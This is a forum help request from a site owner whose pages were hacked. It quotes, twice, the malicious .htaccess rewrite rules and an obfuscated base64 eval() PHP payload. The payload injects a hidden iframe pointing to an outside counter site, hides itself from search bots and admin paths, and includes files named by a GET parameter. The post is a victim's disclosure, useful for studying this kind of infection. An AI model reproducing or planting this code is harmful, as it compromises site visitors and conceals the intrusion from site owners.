my site has been hacked but now every page gives a 404 error
Posted: Tue Jan 19, 2010 6:08 am
My site's URL is: http://www.koothoomi-records.com
My site has been hacked and it worked fine but i noticed whenever a page loaded in the status bar something was loading called grizzli counter.
i then noticed that in all of my remote folders there was a .htaccess file with, where x is a list of random numbers :
#xxxxxxxxxxxx{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) Pxxxxxxxxxxxx.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#xxxxxxxxxxxx}
and all PExxxxxx.php files have this encrypted code in them:
<?php
eval(base64_decode('JElJSUlJSUlJSUlJSSA9ICc8ZGl2IHN0eWxlPSJkaXNwbGF5Om5vbmUiPiZuYnNwOyAmbmJzcDs8aWZyYW1lIGZzZHNkZj0ic2RmZGYiIHdpZHRoPSI3MzIiIGhlaWdodD0iNDA1MSIgc3JjPSJodHRwOi8vZ3JpenpsaS1jb3VudGVyLmNvbS9pZDEyMC9pbmRleC5waHAiPjwvaWZyYW1lPjwvZGl2Pic7IGZ1bmN0aW9uIElJSUlJSUlJSUlJSSgkSUlJSUlJSUlJSUlsKSB7IGdsb2JhbCAkYXJndjsgJElJSUlJSUlJSUlsSSA9IGRpcm5hbWUoZ2V0Y3dkKCkgLiAnLycgLiAkSUlJSUlJSUlJSUlsKTsgJElJSUlJSUlJSUlsbCA9IGdldGN3ZCgpOyBAY2hkaXIoJElJSUlJSUlJSUlsSSk7ICRJSUlJSUlJSUlJbEkgPSBnZXRjd2QoKTsgQGNoZGlyKCRJSUlJSUlJSUlJbGwpOyByZXR1cm4gJElJSUlJSUlJSUlsSTsgfSBmdW5jdGlvbiBJSUlJSUlJSUlJSWwoJElJSUlJSUlJSUlsMSkgeyBpZiggc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJZYW5kZXgvIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIllhRGlyZWN0Qm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIkphbWVzIEJvbmQiKSAhPSBudWxsIHx8IHN0cnN0cigkSUlJSUlJSUlJSWwxLCAiR29vZ2xlYm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIk1lZGlhcGFydG5lcnMtR29vZ2xlIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIlN0YWNrUmFtYmxlciIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJTbHVycCIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJtc25ib3QiKSAhPSBudWxsICkgeyByZXR1cm4gdHJ1ZTsgfSByZXR1cm4gZmFsc2U7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSUkxKCRJSUlJSUlJSUlJbEkpIHsgJElJSUlJSUlJSUkxSSA9IGFycmF5KCdhZG0nLCAncG1hJywgJ21vZGVyJywgJ2NwJyk7ICRJSUlJSUlJSUlJMWwgPSBmYWxzZTsgZm9yZWFjaCAoJElJSUlJSUlJSUkxSSBhcyAkSUlJSUlJSUlJSTExKSB7IGlmKHN0cnN0cigkSUlJSUlJSUlJSWxJLCAkSUlJSUlJSUlJSTExKSAhPSBudWxsKSB7ICRJSUlJSUlJSUlJMWwgPSB0cnVlOyB9IH0gcmV0dXJuICRJSUlJSUlJSUlJMWw7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSWxJKCRJSUlJSUlJSUlsSUkpIHsgZ2xvYmFsICRJSUlJSUlJSUlJSUksICRfU0VSVkVSOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPGlmcmFtZS4qc3R5bGU9LipoaWRkZW4uKlwvaWZyYW1lW14+XSo+L2knLCAiIiwgJElJSUlJSUlJSWxJSSk7ICRJSUlJSUlJSUlsSUkgPSBwcmVnX3JlcGxhY2UoJy88ZGl2LipzdHlsZT0uKmRpc3BsYXk6bm9uZS4qW14+XSo+Lio8aWZyYW1lIC4qXC8uKmRpdltePl0qPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPCEtLSBhZCAtLT48c2NyaXB0W14+XSo+Lio8XC9zY3JpcHQ+PCEtLSBcL2FkIC0tPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyBpZihJSUlJSUlJSUlJSWwoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSA9PSB0cnVlIHx8IElJSUlJSUlJSUlJMShkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKSkgPT0gdHJ1ZSkgeyByZXR1cm4gJElJSUlJSUlJSWxJSTsgfSBlbHNlIHsgaWYocHJlZ19tYXRjaCgiLyg8Ym9keVtePl0qPikvaSIsICRJSUlJSUlJSUlsSUkpID4gMCkgeyByZXR1cm4gcHJlZ19yZXBsYWNlKCIvKDxib2R5W14+XSo+KS9pIiwgIiRJSUlJSUlJSUlsSTEgXG4iLiRJSUlJSUlJSUlJSUksICRJSUlJSUlJSUlsSUksIDEpOyB9IGVsc2UgeyByZXR1cm4gJElJSUlJSUlJSWxJSS4kSUlJSUlJSUlJSUlJOyB9IH0gfSBpZihAb2Jfc3RhcnQoJ0lJSUlJSUlJSUlsSScpID09IHRydWUpIHsgJElJSUlJSUlJSUlJbCA9ICRfR0VUWydxcSddOyBAY2hkaXIoSUlJSUlJSUlJSUlJKCRJSUlJSUlJSUlJSWwpKTsgaW5jbHVkZSgkSUlJSUlJSUlJSUlsKTsgfSBlbHNlIHsgZWNobyAkSUlJSUlJSUlJSUlJOyB9'));
?>
i have since deleted all the PExxxxxxxxx.php files, but now my site displays a 404 not found error page for every page. PLEASE HELP, i need my site back up asap. currently in my .htaccess file i only have redirects in it, when i asked my hosting company for help they said URL /home/fhlinux134/k/koothoomi-records.com/user/PEF7C6ABEE4703.php this file doesnt exist. i am a beginner with php and dont know a lot.
i have gone through my pages and reuploaded them but still nothing, pages such as http://www.koothoomi-records.com/Sitemap.xml work fine. any ideas what to do and i have the file PEF7C6ABEE4703.php on my root but it is now empty.
Thanks
My site has been hacked and it worked fine but i noticed whenever a page loaded in the status bar something was loading called grizzli counter.
i then noticed that in all of my remote folders there was a .htaccess file with, where x is a list of random numbers :
#xxxxxxxxxxxx{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) Pxxxxxxxxxxxx.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#xxxxxxxxxxxx}
and all PExxxxxx.php files have this encrypted code in them:
<?php
eval(base64_decode('JElJSUlJSUlJSUlJSSA9ICc8ZGl2IHN0eWxlPSJkaXNwbGF5Om5vbmUiPiZuYnNwOyAmbmJzcDs8aWZyYW1lIGZzZHNkZj0ic2RmZGYiIHdpZHRoPSI3MzIiIGhlaWdodD0iNDA1MSIgc3JjPSJodHRwOi8vZ3JpenpsaS1jb3VudGVyLmNvbS9pZDEyMC9pbmRleC5waHAiPjwvaWZyYW1lPjwvZGl2Pic7IGZ1bmN0aW9uIElJSUlJSUlJSUlJSSgkSUlJSUlJSUlJSUlsKSB7IGdsb2JhbCAkYXJndjsgJElJSUlJSUlJSUlsSSA9IGRpcm5hbWUoZ2V0Y3dkKCkgLiAnLycgLiAkSUlJSUlJSUlJSUlsKTsgJElJSUlJSUlJSUlsbCA9IGdldGN3ZCgpOyBAY2hkaXIoJElJSUlJSUlJSUlsSSk7ICRJSUlJSUlJSUlJbEkgPSBnZXRjd2QoKTsgQGNoZGlyKCRJSUlJSUlJSUlJbGwpOyByZXR1cm4gJElJSUlJSUlJSUlsSTsgfSBmdW5jdGlvbiBJSUlJSUlJSUlJSWwoJElJSUlJSUlJSUlsMSkgeyBpZiggc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJZYW5kZXgvIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIllhRGlyZWN0Qm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIkphbWVzIEJvbmQiKSAhPSBudWxsIHx8IHN0cnN0cigkSUlJSUlJSUlJSWwxLCAiR29vZ2xlYm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIk1lZGlhcGFydG5lcnMtR29vZ2xlIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIlN0YWNrUmFtYmxlciIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJTbHVycCIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJtc25ib3QiKSAhPSBudWxsICkgeyByZXR1cm4gdHJ1ZTsgfSByZXR1cm4gZmFsc2U7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSUkxKCRJSUlJSUlJSUlJbEkpIHsgJElJSUlJSUlJSUkxSSA9IGFycmF5KCdhZG0nLCAncG1hJywgJ21vZGVyJywgJ2NwJyk7ICRJSUlJSUlJSUlJMWwgPSBmYWxzZTsgZm9yZWFjaCAoJElJSUlJSUlJSUkxSSBhcyAkSUlJSUlJSUlJSTExKSB7IGlmKHN0cnN0cigkSUlJSUlJSUlJSWxJLCAkSUlJSUlJSUlJSTExKSAhPSBudWxsKSB7ICRJSUlJSUlJSUlJMWwgPSB0cnVlOyB9IH0gcmV0dXJuICRJSUlJSUlJSUlJMWw7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSWxJKCRJSUlJSUlJSUlsSUkpIHsgZ2xvYmFsICRJSUlJSUlJSUlJSUksICRfU0VSVkVSOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPGlmcmFtZS4qc3R5bGU9LipoaWRkZW4uKlwvaWZyYW1lW14+XSo+L2knLCAiIiwgJElJSUlJSUlJSWxJSSk7ICRJSUlJSUlJSUlsSUkgPSBwcmVnX3JlcGxhY2UoJy88ZGl2LipzdHlsZT0uKmRpc3BsYXk6bm9uZS4qW14+XSo+Lio8aWZyYW1lIC4qXC8uKmRpdltePl0qPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPCEtLSBhZCAtLT48c2NyaXB0W14+XSo+Lio8XC9zY3JpcHQ+PCEtLSBcL2FkIC0tPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyBpZihJSUlJSUlJSUlJSWwoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSA9PSB0cnVlIHx8IElJSUlJSUlJSUlJMShkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKSkgPT0gdHJ1ZSkgeyByZXR1cm4gJElJSUlJSUlJSWxJSTsgfSBlbHNlIHsgaWYocHJlZ19tYXRjaCgiLyg8Ym9keVtePl0qPikvaSIsICRJSUlJSUlJSUlsSUkpID4gMCkgeyByZXR1cm4gcHJlZ19yZXBsYWNlKCIvKDxib2R5W14+XSo+KS9pIiwgIiRJSUlJSUlJSUlsSTEgXG4iLiRJSUlJSUlJSUlJSUksICRJSUlJSUlJSUlsSUksIDEpOyB9IGVsc2UgeyByZXR1cm4gJElJSUlJSUlJSWxJSS4kSUlJSUlJSUlJSUlJOyB9IH0gfSBpZihAb2Jfc3RhcnQoJ0lJSUlJSUlJSUlsSScpID09IHRydWUpIHsgJElJSUlJSUlJSUlJbCA9ICRfR0VUWydxcSddOyBAY2hkaXIoSUlJSUlJSUlJSUlJKCRJSUlJSUlJSUlJSWwpKTsgaW5jbHVkZSgkSUlJSUlJSUlJSUlsKTsgfSBlbHNlIHsgZWNobyAkSUlJSUlJSUlJSUlJOyB9'));
?>
i have since deleted all the PExxxxxxxxx.php files, but now my site displays a 404 not found error page for every page. PLEASE HELP, i need my site back up asap. currently in my .htaccess file i only have redirects in it, when i asked my hosting company for help they said URL /home/fhlinux134/k/koothoomi-records.com/user/PEF7C6ABEE4703.php this file doesnt exist. i am a beginner with php and dont know a lot.
i have gone through my pages and reuploaded them but still nothing, pages such as http://www.koothoomi-records.com/Sitemap.xml work fine. any ideas what to do and i have the file PEF7C6ABEE4703.php on my root but it is now empty.
Thanks